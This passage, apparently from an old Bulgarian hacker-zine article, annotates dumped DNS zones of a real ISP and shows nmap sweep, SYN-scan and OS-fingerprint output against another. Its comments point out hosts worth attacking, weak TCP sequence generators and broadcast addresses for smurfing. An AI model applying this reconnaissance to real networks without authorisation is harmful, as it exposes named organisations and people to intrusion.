serveri.Vsushtnost,v .bg maj pochti nqma smisul ot otdelna mashina za irc
server .. Osven ako nqkoj bolen mozuk ne se navie da se vurzva kum EFNET
:)))) ]>
biolin IN A 212.50.0.9
<[ malko po-razlichno ime - server na BIOTEAM ]>
mail IN CNAME ns.spnet.net.
<[ glaven mail relay.Povecheto ot mail clientite (naprimer Netscape
messenger) idvat nastroeni da polzvat SMTP s ime mail i e mnogo po-lesno da
se slozhi alias v DNS-to otkolkoto da se smenqt nastrojki... ]>
spnet2netbg IN A 212.50.10.226
IN A 212.50.10.230
<[ pak adresi na interface na router ]>
pirdop1 IN A 212.50.0.238
<[ interesno ...po-nadolu ima i pirdop samo - izglezhda tam ima samo 1
dialup ?ili mashina za localniq admin ? ]>
haskovo IN MX 10 gis.spnet.net.
$ORIGIN haskovo.spnet.net.
mail IN CNAME gis.spnet.net.
www IN CNAME gis.spnet.net.
proxy IN CNAME gis.spnet.net.
ns IN CNAME gis.spnet.net.
ftp IN CNAME gis.spnet.net.
$ORIGIN spnet.net.
proxy IN CNAME purgatory.spnet.net.
<[ Glaven proxy server na firmata ..prichinata za takuv alias e sushtata
kato za alias-a 'mail' ]>
digsys2spnet-local IN A 212.50.10.237
router2 IN A 212.50.0.2
digsys2spnet IN A 212.50.10.253
router3 IN A 212.50.0.3
$ORIGIN sirma.spnet.net.
router IN A 212.50.14.129
$ORIGIN spnet.net.
router4 IN A 212.50.0.4
dialup255 IN A 212.50.13.255
router7 IN A 212.50.0.7
router8 IN A 212.50.0.8
ns IN A 212.50.0.10
<[ glaven name server i mail relay (vizh po-gore) ]>
router IN A 212.50.0.1
<[ centralen router - koj znae kvo CISCO ... ]>
parvak IN A 212.50.0.12
<[mashina na admina - poznava se po imeto...po princip nikoj ne krushtava
glaven server s podobno ime. ]>
debian IN A 212.50.0.16
<[ Debian archive...... DA ZHIVEJ! :))) ]>
(Bel.Iron - Da eibian ;-)
ibsf IN A 212.50.0.225
IN MX 10 ibsf.spnet.net.
<[ eto oshte edin client s naeta liniq i mail relaying... ]>
pool IN CNAME ns.spnet.net.
switch IN A 212.50.0.6
$ORIGIN plovdiv.spnet.net.
router IN A 212.50.21.1
$ORIGIN spnet.net.
gis IN A 212.50.0.241
rakia IN CNAME parvak.spnet.net.
<[ CNAME za mashinata na admina .... ]>
harmanli IN A 212.50.14.97
IN MX 10 harmanli.spnet.net.
$ORIGIN harmanli.spnet.net.
cst IN CNAME harmanli.spnet.net.
mail IN CNAME harmanli.spnet.net.
proxy IN CNAME harmanli.spnet.net.
www IN CNAME harmanli.spnet.net.
ns IN CNAME harmanli.spnet.net.
ftp IN CNAME harmanli.spnet.net.
$ORIGIN spnet.net.
pirdop IN A 212.50.0.237
IN MX 10 pirdop.spnet.net.
$ORIGIN pirdop.spnet.net.
mail IN CNAME pirdop.spnet.net.
www IN CNAME pirdop.spnet.net.
proxy IN CNAME pirdop.spnet.net.
ns IN CNAME pirdop.spnet.net.
ftp IN CNAME pirdop.spnet.net.
<[ ha,koj da ti predpolozhi che ima SPNET v pirdop ? :))) ]>
$ORIGIN spnet.net.
manro IN A 212.50.0.17
ftp IN CNAME purgatory.spnet.net.
coin IN A 212.50.0.14
spnet2bdata IN A 212.50.10.250
support IN A 212.50.0.19
radius IN CNAME ns.spnet.net.
$ORIGIN center.spnet.net.
router3 IN A 212.50.0.67
anemia IN A 212.50.0.69
<[ pak interesna mashina ......i to v center.spnet.net, koeto se vodi zonata
na glavnite routeri... ]>
router4 IN A 212.50.0.68
switch IN A 212.50.0.70
router IN A 212.50.0.65
router2 IN A 212.50.0.66
$ORIGIN spnet.net.
purgatory IN A 212.50.0.15
modem0 IN A 212.50.0.43
modem1 IN A 212.50.0.44
modem2 IN A 212.50.0.45
modem3 IN A 212.50.0.46
modem4 IN A 212.50.0.47
modem5 IN A 212.50.0.48
modem6 IN A 212.50.0.49
modem7 IN A 212.50.0.50
modem8 IN A 212.50.0.51
modem9 IN A 212.50.0.52
pernik IN A 212.50.19.65
IN MX 10 pernik.spnet.net.
$ORIGIN pernik.spnet.net.
pool6 IN A 212.50.19.86
pool7 IN A 212.50.19.87
pool0 IN A 212.50.19.80
pool1 IN A 212.50.19.81
mail IN CNAME pernik.spnet.net.
pool2 IN A 212.50.19.82
www IN CNAME pernik.spnet.net.
proxy IN CNAME pernik.spnet.net.
pool3 IN A 212.50.19.83
pool4 IN A 212.50.19.84
pool5 IN A 212.50.19.85
ns IN CNAME pernik.spnet.net.
router IN A 212.50.19.66
ftp IN CNAME pernik.spnet.net.
<[ tuka si lichi po-seriozno prisustvie v pernik (???) s 8 dial-up-a, s
router (kojto mozhe i prosto da si e chist linux i pernik i router da sa na
edna mashina), dazhe i s www ....
Mozhe da se proveri i dali router i pernik sa edna mashina, chrez
traceroute....
Sled edna proba se okazva, che router. pernik ili mu se filtrira traceroute,
ili prosto go nqma, i e sled pernik.spnet v topologiqta.. koeto mozhe da
znachi, che IP-to ili e slozheno po navik, ili im e grumnal router-a, ili
prosto e nqkakuv router, na kojto se zakachat dial-upi i nishto poveche...
(tuka kay otbelqza, che mozhe da e nqkakuv dial-in router, nqkakuv
portmaster i t.n. kojto da se filtrira.) ]>
$ORIGIN spnet.net.
dialup002 IN A 212.50.13.2
ingbank IN MX 10 ibsf.spnet.net.
IN CNAME ibsf.spnet.net.
<[eto kakvo bilo isbf - INGBANK...]>
bta IN A 212.50.10.130
<[ BTA .... Interesno ... na tema BTA mozhe da se napishe oshte edna statiq
:) ]>
spnet2netissat IN A 212.50.10.234
zlatica IN A 212.50.0.233
IN MX 10 zlatica.spnet.net.
$ORIGIN zlatica.spnet.net.
mail IN CNAME zlatica.spnet.net.
www IN CNAME zlatica.spnet.net.
proxy IN CNAME zlatica.spnet.net.
ns IN CNAME zlatica.spnet.net.
ftp IN CNAME zlatica.spnet.net.
$ORIGIN spnet.net.
netbg2spnet IN A 212.50.10.225
IN A 212.50.10.229
spnet2digsys IN A 212.50.10.254
www IN CNAME purgatory.spnet.net.
topbg IN CNAME purgatory.spnet.net.
Tova gore-dolu predstavlqva DNS bazata na edin golqm (za BG) provider.
Razlichni useri, postoqnni IP-ta, 254 IP-ta zadeleni za dialup..
A eto i edna ot reverse zonite im (tqhnata glavna) :
$ORIGIN 50.212.in-addr.arpa.
0 IN SOA ns.spnet.net. shtinkov.ns.spnet.net. (
1999071400 28800 7200 604800 86400 )
IN NS ns.spnet.net.
IN NS purgatory.spnet.net.
<[ ^^^ sushtiq SOA record..... ]>
$ORIGIN 0.50.212.in-addr.arpa.
1 IN PTR router.spnet.net.
2 IN PTR router2.spnet.net.
3 IN PTR router3.spnet.net.
4 IN PTR router4.spnet.net.
6 IN PTR switch.spnet.net.
7 IN PTR router7.spnet.net.
8 IN PTR router8.spnet.net.
9 IN PTR biolin.spnet.net.
161 IN PTR skat.spnet.net.
10 IN PTR ns.spnet.net.
11 IN PTR bta.spnet.net.
12 IN PTR parvak.spnet.net.
14 IN PTR coin.spnet.net.
15 IN PTR purgatory.spnet.net.
16 IN PTR debian.spnet.net.
17 IN PTR manro.spnet.net.
19 IN PTR support.spnet.net.
193 IN PTR cst.spnet.net.
43 IN PTR modem0.spnet.net.
44 IN PTR modem1.spnet.net.
45 IN PTR modem2.spnet.net.
46 IN PTR modem3.spnet.net.
47 IN PTR modem4.spnet.net.
50 IN PTR modem7.spnet.net.
48 IN PTR modem5.spnet.net.
51 IN PTR modem8.spnet.net.
49 IN PTR modem6.spnet.net.
52 IN PTR modem9.spnet.net.
225 IN PTR ibsf.spnet.net.
53 IN PTR modem10.spnet.net.
54 IN PTR modem11.spnet.net.
55 IN PTR modem12.spnet.net.
56 IN PTR modem13.spnet.net.
57 IN PTR modem19.spnet.net.
60 IN PTR modem16.spnet.net.
58 IN PTR modem14.spnet.net.
233 IN PTR zlatica.spnet.net.
61 IN PTR modem17.spnet.net.
59 IN PTR modem15.spnet.net.
234 IN PTR stoyan.zlatica.spnet.net.
62 IN PTR modem18.spnet.net.
237 IN PTR pirdop.spnet.net.
65 IN PTR router.center.spnet.net.
238 IN PTR pirdop1.spnet.net.
66 IN PTR router2.center.spnet.net.
241 IN PTR gis.spnet.net.
67 IN PTR router3.center.spnet.net.
242 IN PTR admin.haskovo.spnet.net.
70 IN PTR switch.center.spnet.net.
68 IN PTR router4.center.spnet.net.
243 IN PTR pool1.haskovo.spnet.net.
69 IN PTR anemia.center.spnet.net.
244 IN PTR pool2.haskovo.spnet.net.
245 IN PTR pool3.haskovo.spnet.net.
246 IN PTR pool4.haskovo.spnet.net.
247 IN PTR pool5.haskovo.spnet.net.
248 IN PTR pool6.haskovo.spnet.net.
<[dotuk,standartnata informaciq koqto poluchihme ot predishnata DNS
baza...... ]>
81 IN PTR biolin.bioteam.com.
82 IN PTR dimitrov.bioteam.com.
83 IN PTR corn.bioteam.com.
84 IN PTR kirilov.bioteam.com.
85 IN PTR tanja.bioteam.com.
86 IN PTR petrova.bioteam.com.
87 IN PTR zheliazkov.bioteam.com.
90 IN PTR topalov.bioteam.com.
88 IN PTR kckfb.bioteam.com.
89 IN PTR valov.bioteam.com.
<[ eto kak se otkrivat interesni mashini za ataka - username.xxx.com :))
tova, kakto izglezhda, sa potrebitelski mashini s postoqnni realni
IP-ta... tova sa vuzmozhno naj-uqzvimite mashini po net-a... (mozhe bi sled
dial-upite... a mozhe i da sa predi tqh). ]>
Ako drupnem nqkoq ot drugite reverse DNS bazi, mozhem da otkriem drugi
domain-i, hostvani ot SPNET - kato naprimer yellowpages.bg i t.n. Taka,
kakto normalnoto DNS ni dava obshta informaciq za provider-a, taka i reverse
DNS bazata mozhe da dade informaciq za hostvanite vutre hora/firmi/drugi
ISP-ta i t.n.
1.2. nmap -sP (t.e. proverka koi IP-ta se izpozlvat), zapulnenost
na IP zonata, golemina na providera
<[ za tuk sum izpolzval nqkoi stari scan-ove na infotel... ]>
Starting nmap V. 1.51 by Fyodor (fyodor@dhp.com, www.dhp.com/~fyodor/nmap/)
Host (212.39.64.16) seems to be a subnet broadcast address (returned 8 extra pings)
Host ns.infotel.bg (212.39.64.18) appears to be up.
Host unnamed.infotel.bg (212.39.64.19) appears to be up.
Host unnamed.infotel.bg (212.39.64.20) appears to be up.
Host tch.infotel.bg (212.39.64.22) appears to be up.
Host c2501.infotel.bg (212.39.64.23) appears to be up.
Host acp70.infotel.bg (212.39.64.24) appears to be up.
Host c2522.infotel.bg (212.39.64.27) appears to be up.
Host c2511.infotel.bg (212.39.64.28) appears to be up.
Host nb.infotel.bg (212.39.64.29) appears to be up.
Host (212.39.64.31) seems to be a subnet broadcast address (returned 8 extra pings)
Host (212.39.64.32) seems to be a subnet broadcast address (returned 2 extra pings)
<[ koj mu se smurfira ? :))) Izglezhda i pri nas ima broadcast-ove...]>
Host unnamed.infotel.bg (212.39.64.33) appears to be up.
Host unnamed.infotel.bg (212.39.64.34) appears to be up.
Host (212.39.64.35) seems to be a subnet broadcast address (returned 2 extra pings)
Host (212.39.64.48) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.49) appears to be up.
Host unnamed.infotel.bg (212.39.64.51) appears to be up.
Host unnamed.infotel.bg (212.39.64.55) appears to be up.
Host unnamed.infotel.bg (212.39.64.57) appears to be up.
Host unnamed.infotel.bg (212.39.64.59) appears to be up.
Host unnamed.infotel.bg (212.39.64.60) appears to be up.
Host (212.39.64.63) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.97) appears to be up.
Host (212.39.64.100) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.101) appears to be up.
Host unnamed.infotel.bg (212.39.64.102) appears to be up.
Host (212.39.64.103) seems to be a subnet broadcast address (returned 1 extra pings)
Host (212.39.64.112) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.113) appears to be up.
Host unnamed.infotel.bg (212.39.64.114) appears to be up.
Host vg.infotel.bg (212.39.64.116) appears to be up.
Host (212.39.64.127) seems to be a subnet broadcast address (returned 1 extra pings)
Host pomps.infotel.bg (212.39.64.129) appears to be up.
Host unnamed.infotel.bg (212.39.64.132) appears to be up.
Host unnamed.infotel.bg (212.39.64.137) appears to be up.
Host unnamed.infotel.bg (212.39.64.139) appears to be up.
Host unnamed.infotel.bg (212.39.64.140) appears to be up.
Host unnamed.infotel.bg (212.39.64.144) appears to be up.
Host unnamed.infotel.bg (212.39.64.145) appears to be up.
Host unnamed.infotel.bg (212.39.64.146) appears to be up.
Host (212.39.64.159) seems to be a subnet broadcast address (returned 1 extra pings)
Host (212.39.64.160) seems to be a subnet broadcast address (returned 2 extra pings)
Host unnamed.infotel.bg (212.39.64.161) appears to be up.
Host unnamed.infotel.bg (212.39.64.163) appears to be up.
Host unnamed.infotel.bg (212.39.64.164) appears to be up.
Host unnamed.infotel.bg (212.39.64.165) appears to be up.
Host unnamed.infotel.bg (212.39.64.166) appears to be up.
Host unnamed.infotel.bg (212.39.64.170) appears to be up.
Host unnamed.infotel.bg (212.39.64.172) appears to be up.
Host unnamed.infotel.bg (212.39.64.174) appears to be up.
Host unnamed.infotel.bg (212.39.64.176) appears to be up.
Host unnamed.infotel.bg (212.39.64.177) appears to be up.
Host unnamed.infotel.bg (212.39.64.179) appears to be up.
Host (212.39.64.191) seems to be a subnet broadcast address (returned 1 extra pings)
Host (212.39.64.208) seems to be a subnet broadcast address (returned 4 extra pings)
Host unnamed.infotel.bg (212.39.64.209) appears to be up.
Host unnamed.infotel.bg (212.39.64.210) appears to be up.
Host unnamed.infotel.bg (212.39.64.211) appears to be up.
Host unnamed.infotel.bg (212.39.64.213) appears to be up.
Host unnamed.infotel.bg (212.39.64.218) appears to be up.
Host unnamed.infotel.bg (212.39.64.221) appears to be up.
Host unnamed.infotel.bg (212.39.64.222) appears to be up.
Host (212.39.64.223) seems to be a subnet broadcast address (returned 4 extra pings)
Host (212.39.64.224) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.225) appears to be up.
Host unnamed.infotel.bg (212.39.64.226) appears to be up.
Host unnamed.infotel.bg (212.39.64.227) appears to be up.
Host unnamed.infotel.bg (212.39.64.228) appears to be up.
Host unnamed.infotel.bg (212.39.64.230) appears to be up.
Host unnamed.infotel.bg (212.39.64.234) appears to be up.
Host (212.39.64.239) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.253) appears to be up.
Host unnamed.infotel.bg (212.39.64.254) appears to be up.
Starting nmap V. 1.51 by Fyodor (fyodor@dhp.com, www.dhp.com/~fyodor/nmap/)
Host (212.39.65.0) appears to be down.
Host (212.39.65.0) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.65.1) appears to be up.
Host unnamed.infotel.bg (212.39.65.2) appears to be up.
Host unnamed.infotel.bg (212.39.65.3) appears to be up.
Host unnamed.infotel.bg (212.39.65.4) appears to be up.
Host unnamed.infotel.bg (212.39.65.5) appears to be up.
Host unnamed.infotel.bg (212.39.65.6) appears to be up.
Host (212.39.65.7) appears to be down.
Host (212.39.65.8) appears to be down.
Host (212.39.65.9) appears to be down.
Host (212.39.65.10) appears to be down.
Host (212.39.65.11) appears to be down.
Host (212.39.65.12) appears to be down.
Host (212.39.65.13) appears to be down.
Host (212.39.65.14) appears to be down.
Host (212.39.65.15) appears to be down.
Host (212.39.65.15) seems to be a subnet broadcast address (returned 1 extra pings)
Host (212.39.65.16) appears to be down.
Host (212.39.65.16) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.65.17) appears to be up.
Host unnamed.infotel.bg (212.39.65.18) appears to be up.
Host unnamed.infotel.bg (212.39.65.19) appears to be up.
Host (212.39.65.20) appears to be down.
Host (212.39.65.21) appears to be down.
Host (212.39.65.22) appears to be down.
Host (212.39.65.23) appears to be down.
Host (212.39.65.24) appears to be down.
Host (212.39.65.25) appears to be down.
Host (212.39.65.26) appears to be down.
Host (212.39.65.27) appears to be down.
Host (212.39.65.28) appears to be down.
Host (212.39.65.29) appears to be down.
Host (212.39.65.30) appears to be down.
Host (212.39.65.31) appears to be down.
Host (212.39.65.31) seems to be a subnet broadcast address (returned 1 extra pings)
Host (212.39.65.32) appears to be down.
<[ tuka sum otrqzal malko hostove deto sa down ....ottuka nadolu kadeto sa
po poveche ot 5-6 down sa orqzani ]>
Host (212.39.65.87) appears to be down.
Host unnamed.infotel.bg (212.39.65.88) appears to be up.
Host (212.39.65.89) appears to be down.
Host (212.39.65.96) appears to be down.
Host unnamed.infotel.bg (212.39.65.97) appears to be up.
Host (212.39.65.98) appears to be down.
Host unnamed.infotel.bg (212.39.65.99) appears to be up.
Host (212.39.65.100) appears to be down.
Host (212.39.65.132) appears to be down.
Host pppsof5.infotel.bg (212.39.65.133) appears to be up.
Host (212.39.65.134) appears to be down.
Host (212.39.65.135) appears to be down.
Host (212.39.65.136) appears to be down.
Host (212.39.65.137) appears to be down.
Host pppsof10.infotel.bg (212.39.65.138) appears to be up.
Host (212.39.65.139) appears to be down.
Host (212.39.65.149) appears to be down.
Host pppsof22.infotel.bg (212.39.65.150) appears to be up.
<[ Nqkoi dialupi....... ]>
Host (212.39.65.151) appears to be down.
Host (212.39.65.192) appears to be down.
Host (212.39.65.192) seems to be a subnet broadcast address (returned 5 extra pings)
Host fpn.infotel.bg (212.39.65.193) appears to be up.
Host (212.39.65.194) appears to be down.
Host db.infotel.bg (212.39.65.195) appears to be up.
Host www1.infotel.bg (212.39.65.196) appears to be up.
Host hdesk.gurko.cits.btc.bg (212.39.65.197) appears to be up.
<[ Edinstvenata mashina v domain-a btc.bg ...]>
Host unnamed.infotel.bg (212.39.65.198) appears to be up.
Host ibm2210.infotel.bg (212.39.65.199) appears to be up.
Host (212.39.65.200) appears to be down.
Host (212.39.65.207) appears to be down.
Host (212.39.65.207) seems to be a subnet broadcast address (returned 5 extra pings)
<[ pak broadcast ... ]>
Host (212.39.65.208) appears to be down.
Host (212.39.65.208) seems to be a subnet broadcast address (returned 1 extra pings)
Host db.infotel.bg (212.39.65.209) appears to be up.
Host fpn.infotel.bg (212.39.65.210) appears to be up.
Host www1.infotel.bg (212.39.65.211) appears to be up.
Host fw.infotel.bg (212.39.65.212) appears to be up.
Host (212.39.65.213) appears to be down.
Host (212.39.65.214) appears to be down.
Host nb.infotel.bg (212.39.65.215) appears to be up.
Host switch.infotel.bg (212.39.65.216) appears to be up.
Host unnamed.infotel.bg (212.39.65.217) appears to be up.
Host (212.39.65.218) appears to be down.
Host (212.39.65.219) appears to be down.
Host (212.39.65.220) appears to be down.
Host br.infotel.bg (212.39.65.221) appears to be up.
Host (212.39.65.222) appears to be down.
Host (212.39.65.223) appears to be down.
Host (212.39.65.223) seems to be a subnet broadcast address (returned 1 extra pings)
Host (212.39.65.224) appears to be down.
Host (212.39.65.255) appears to be down.
<[ Scan-yt e mnogo star i sum pochti siguren, che ne e aktualen veche, no se
vizhda, che v tazi zona ima serveri i routeri kato za mnogo golqmo ISP... A
ot sledvashtata tochka shte se vidi tochno kolko golqmo... Da ne zabravq da
dobavqm, che scan-a e praven po nikoe vreme prez noshtta (okolo 4:00 am ) ]>
1.3. nmap -sS -O (izpolzvani OS-ove),po-izvestni neshta
za specifichnite mrezhovo-orientirani OS-ove.
<[ E,tuka pravih scan s 2.01, zashtoto ima OS scan .. ]>
Starting nmap V. 2.01 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Host unnamed.infotel.bg (212.39.64.0) appears to be down, skipping it.
<[ Tuk pak sum orqzal hostovete deto sa down ]>
Host unnamed.infotel.bg (212.39.64.16) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.16) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Host unnamed.infotel.bg (212.39.64.17) appears to be down, skipping it.
Host ns.infotel.bg (212.39.64.18) appears to be up ... good.
Initiating SYN half-open stealth scan against ns.infotel.bg (212.39.64.18)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
The SYN scan took 49 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 40836 is closed and neither are firewalled
Interesting ports on ns.infotel.bg (212.39.64.18):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
13 open tcp daytime
19 open tcp chargen
21 filtered tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
49 filtered tcp unknown
53 open tcp domain
80 filtered tcp www
110 open tcp pop3
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
Sequence numbers: 52871601 52804001 528DEC01 52A17401
Remote operating system guess: AIX 4.1
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=N%W=3F25%ACK=S++%Flags=AS%Ops=M)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=N%W=4000%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=15C%RID=E%RIPCK=F%UCK=E%ULEN=134%DAT=E)
<[ hihi...AIX-che,i to s mnogo prost TCP sequence number generator]>
Host unnamed.infotel.bg (212.39.64.19) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.20) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.20)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 53 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 41396 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.20):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=165610 (Good luck!)
Sequence numbers: 193786BC 193CCA3F 193CB80D 193CDC3D 193786BC 193CB80D
Remote operating system guess: Cisco IOS 11.3 - 12.0
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=286EA)
T1(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[ routerche ..... ]>
Host unnamed.infotel.bg (212.39.64.21) appears to be down, skipping it.
Host tch.infotel.bg (212.39.64.22) appears to be up ... good.
Initiating SYN half-open stealth scan against tch.infotel.bg (212.39.64.22)
Adding TCP port 23 (state Open).
The SYN scan took 79 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 30852 is closed and neither are firewalled
Interesting ports on tch.infotel.bg (212.39.64.22):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=constant sequence number (!)
Difficulty=0 (Trivial joke)
Sequence numbers: 7F 7F 7F 7F 7F 7F
Remote operating system guess: ComOS - Livingston PortMaster (unknown version number)
OS Fingerprint:
TSeq(Class=C%Val=7F)
T1(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T2(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=F%UCK=0%ULEN=134%DAT=E)
<[ Dialin server .... loshoto e, che nqma kak da se nameri broq portove
(vhodni tochki) ]>
Host c2501.infotel.bg (212.39.64.23) appears to be up ... good.
Initiating SYN half-open stealth scan against c2501.infotel.bg (212.39.64.23)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 72 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 34074 is closed and neither are firewalled
Interesting ports on c2501.infotel.bg (212.39.64.23):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=54438 (Worthy challenge)
Sequence numbers: 8C3BBB63 8C3B9183 8C3C0E3B 8C3E6311 8C3E709A 8C3EF28B
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=D4A6)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[ oshte edin router .... ]>
Host acp70.infotel.bg (212.39.64.24) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.25) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.26) appears to be down, skipping it.
Host c2522.infotel.bg (212.39.64.27) appears to be up ... good.
Initiating SYN half-open stealth scan against c2522.infotel.bg (212.39.64.27)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 133 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 35085 is closed and neither are firewalled
Interesting ports on c2522.infotel.bg (212.39.64.27):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=47238 (Worthy challenge)
Sequence numbers: 98A2BF85 98A2B041 98A6608B 98A67D6F 98A66F2B 98A68BEF
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=2%SI=B886)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[ I pak router ...]>
Host c2511.infotel.bg (212.39.64.28) appears to be up ... good.
Initiating SYN half-open stealth scan against c2511.infotel.bg (212.39.64.28)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 57 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 43591 is closed and neither are firewalled
Interesting ports on c2511.infotel.bg (212.39.64.28):
Port State Protocol Service
21 filtered tcp ftp
23 open tcp telnet
49 filtered tcp unknown
79 open tcp finger
80 filtered tcp www
111 filtered tcp sunrpc
TCP Sequence Prediction: Class=random positive increments
Difficulty=46280 (Worthy challenge)
Sequence numbers: A0700F7E A0702555 A0720C52 A0721A9A A071FC99 A07260F2
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=B4C8)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
<[ i pak ]>
Host nb.infotel.bg (212.39.64.29) appears to be up ... good.
Initiating SYN half-open stealth scan against nb.infotel.bg (212.39.64.29)
The SYN scan took 60 seconds to scan 120 ports.
Warning: No ports found open on this machine, OS detection will be MUCH less reliable
